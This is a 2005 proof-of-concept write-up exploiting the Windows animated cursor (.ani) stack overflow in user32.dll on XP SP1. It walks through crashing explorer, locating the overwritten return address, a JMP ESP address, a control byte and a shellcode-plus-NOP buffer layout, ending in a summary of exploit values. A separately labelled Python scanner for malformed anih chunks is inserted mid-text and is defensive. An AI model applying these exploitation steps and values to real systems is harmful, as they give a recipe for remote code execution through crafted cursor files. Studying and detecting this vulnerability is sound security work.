Windows ANI File Parsing Proof Of Concept
-----------------------------------------

Advisory Date (By eEye) : 11 January 2005
Proof of Concept Date   : 12 January 2005
Author                  : Assaf Reshef
Original POC URL        : http://underwar.livedns.co.il/projects/ani/
Tested On               : Windows XP SP1 (Should not work on others)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Disclaimer
----------

This demonstration is for educational purposes only. Please don't use it for illegal actions. I will take no responsibility for any action caused by the use of this information. Use it at your own risk.

Introduction
------------

This document demonstrates an exploit of a vulnerability in USER32.DLL's handling of Windows animated cursor (.ani) files that allows a remote attacker to reliably overwrite the stack with arbitrary data and execute arbitrary code.

Step 1: Learning & Crashing
---------------------------

Understanding the exploitation process requires knowledge of the ANI file specification [3]. We take a simple ANI file (vanisher.ani) from c:\windows\cursors\ and, using a hex editor, change the vulnerable field (the AnimationHeaderBlock length) of the ANI to FFFFFFFF.

Result: explorer crashes. Checking what happens in OllyDbg, we find that explorer crashed here (in user32.dll):

    77D72E4D F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

It seems we are copying too much data. After several tries, we figured out that this instruction writes to a changing memory area, so we will have to use a fixed return address (jmp esp).

Note: before our interesting call (the one that glitches), the buffer length is moved into EDX (at line 77D72E30). The only thing done before copying the string is the instruction SHR ECX,2 (dividing the length by 4, because we are copying dwords); we don't have to bother about it.
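As an added, defender-side example (not part of the original writeup and not Microsoft's fix), the following Python script walks the RIFF chunk list of an .ani file and flags an "anih" chunk whose declared size is not the 36 bytes of the ANIHEADER structure, or whose declared size runs past the end of the file. The anih chunk's size field is the value the writeup calls the AnimationHeaderBlock length, so this is the inconsistency that the modified vanisher.ani above introduces, and it is the check a file scanner or a hardened loader would apply before copying the chunk into a fixed-size buffer. The two sample files are constructed inline (a minimal RIFF/ACON containing only an anih chunk, not a real cursor), and the function names and the "accept exactly 36 bytes" policy are choices made for this example.

```python
import struct

# sizeof(ANIHEADER): nine little-endian DWORD fields
# (cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags)
ANIH_SIZE = 36


def build_ani(anih_declared_len, anih_payload):
    """Build a minimal RIFF/ACON file for testing.

    This is a constructed sample: a RIFF header, the ACON form type and a
    single anih chunk. The chunk's size field is set to anih_declared_len
    regardless of the real payload length, so malformed files can be built.
    """
    anih_chunk = b"anih" + struct.pack("<I", anih_declared_len) + anih_payload
    body = b"ACON" + anih_chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data, start, end):
    """Yield (fourcc, declared_len, payload_offset) for the RIFF sub-chunks in
    data[start:end]. The declared length is reported but never trusted to
    index the buffer: walking stops as soon as a chunk would run past `end`."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        declared = struct.unpack_from("<I", data, pos + 4)[0]
        yield fourcc, declared, pos + 8
        # RIFF pads odd-sized chunks to an even boundary
        nxt = pos + 8 + declared + (declared & 1)
        if nxt > end:
            return  # oversized chunk: cannot continue safely
        pos = nxt


def check_ani(data):
    """Return a list of findings (strings). An empty list means the anih chunk
    is consistent with the ANIHEADER layout and with the file size."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]
    riff_len = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + riff_len)  # never let the RIFF size extend past the data
    saw_anih = False
    for fourcc, declared, payload_off in iter_chunks(data, 12, end):
        if fourcc != b"anih":
            continue
        saw_anih = True
        # A loader copies this chunk into a fixed ANIHEADER; anything but 36 is suspect.
        if declared != ANIH_SIZE:
            findings.append(
                f"anih chunk declares {declared:#x} bytes, expected {ANIH_SIZE:#x}")
        # Length that exceeds the file is the unbounded-copy condition.
        if payload_off + declared > len(data):
            findings.append("anih length exceeds file size (unbounded copy)")
        # The structure's own cbSizeof field should agree with the chunk size.
        if declared >= 4 and payload_off + 4 <= len(data):
            cb = struct.unpack_from("<I", data, payload_off)[0]
            if cb != ANIH_SIZE:
                findings.append(f"anih cbSizeof field is {cb:#x}, expected {ANIH_SIZE:#x}")
    if not saw_anih:
        findings.append("no anih chunk found")
    return findings


# Constructed ANIHEADER payload: cbSizeof=36, 1 frame, 1 step, 32x32, 32 bpp,
# 1 plane, JifRate=10, flags=1 (AF_ICON).
SAMPLE_HEADER = struct.pack("<9I", 36, 1, 1, 32, 32, 32, 1, 10, 1)

# Well-formed file: declared anih size matches the 36-byte payload.
GOOD_ANI = build_ani(ANIH_SIZE, SAMPLE_HEADER)
# Malformed file in the spirit of the writeup: the size field set to FFFFFFFF.
BAD_ANI = build_ani(0xFFFFFFFF, SAMPLE_HEADER)
# Truncated file: size says 36 but only 20 bytes of header follow.
SHORT_ANI = build_ani(ANIH_SIZE, SAMPLE_HEADER[:20])

if __name__ == "__main__":
    for name, sample in (("good", GOOD_ANI), ("bad", BAD_ANI), ("short", SHORT_ANI)):
        print(name, check_ani(sample) or ["ok"])
```

Run it directly to see the three verdicts; feed `check_ani()` the bytes of any real .ani file to scan it. The walker deliberately reads the size field only to report it and to decide whether to stop, which is the opposite of what the crashing REP MOVS in user32.dll does with the same value.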
Step 2: Finding a return address overwrite
------------------------------------------

Stepping through the memory that gets overflowed, we find that the return address of the vulnerable function is overwritten by the dword at offset 0x30 from our buffer. So our fake return address should be placed 0x30 bytes after the buffer starts. Now we set the DWORD at 0x30 to AAAAAAAA and look at when it gets called.

Step 3: Looking for jump
------------------------

After the string copy, the first time explorer touches our written value is here:

    77D73213 TEST BYTE PTR DS:[EDI+4],1
    77D73217 JNZ USER32.77D8296E
    ....

and this code eventually returns here:

    77D731BE . 85C0        TEST EAX,EAX
    77D731C0 . 74 32       JE SHORT USER32.77D731F4
    77D731C2 . F645 F4 01  TEST BYTE PTR SS:[EBP-C],1    <--------- [EBP-C] = Offset 0x20 inside our buffer.
    77D731C6 . 74 2C       JE SHORT USER32.77D731F4      <--------- We want to jump here!
    77D731C8 . 837D D8 00  CMP DWORD PTR SS:[EBP-28],0
    77D731CC . 74 26       JE SHORT USER32.77D731F4

We control the TEST result (it points into our buffer), and checking the jump revealed that it will eventually jump to our code. So let's set 0x20 to 0x02 to ensure our jump.

The critical jump is here:

    77D731ED > 5F          POP EDI
    77D731EE . 5E          POP ESI
    77D731EF . 5B          POP EBX
    77D731F0 . C9          LEAVE
    77D731F1 . C2 1800     RETN 18                       <------------- Here

Remember that the address for the jump is at offset 0x30 in our buffer. Since memory is dynamic, we will use the fixed address 77DA73E0 in user32.dll for the JMP ESP (thanks Metasploit).

Step 4: Writing Final Things
----------------------------

Getting the shellcode from Metasploit (thanks again for saving me some time), and we are in business. Let's calculate the buffer length: our shellcode is 0x13e bytes + 0x2e9 NOPs + 0x34 for the header => the total buffer is 0x45c bytes.
Values Summary
--------------

AnimationHeaderBlock length = 0x45c
Offset 0x30 in our buffer   = 77DA73E0 (0xE073DA77)
Offset 0x20 in our buffer   = 0x02 (To make the TEST work)

Thanks
------

Nir Adar
evilbitz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References
----------

[1] eEye Original Advisory
    http://www.eeye.com/html/research/advisories/AD20050111.html
[2] Microsoft Security Bulletin MS05-002
    http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
[3] ANI File Format
    http://underwar.livedns.co.il/projects/ani/ani_file_format.txt
    Originally from http://www.wotsit.org/download.asp?f=ani, but they block direct access.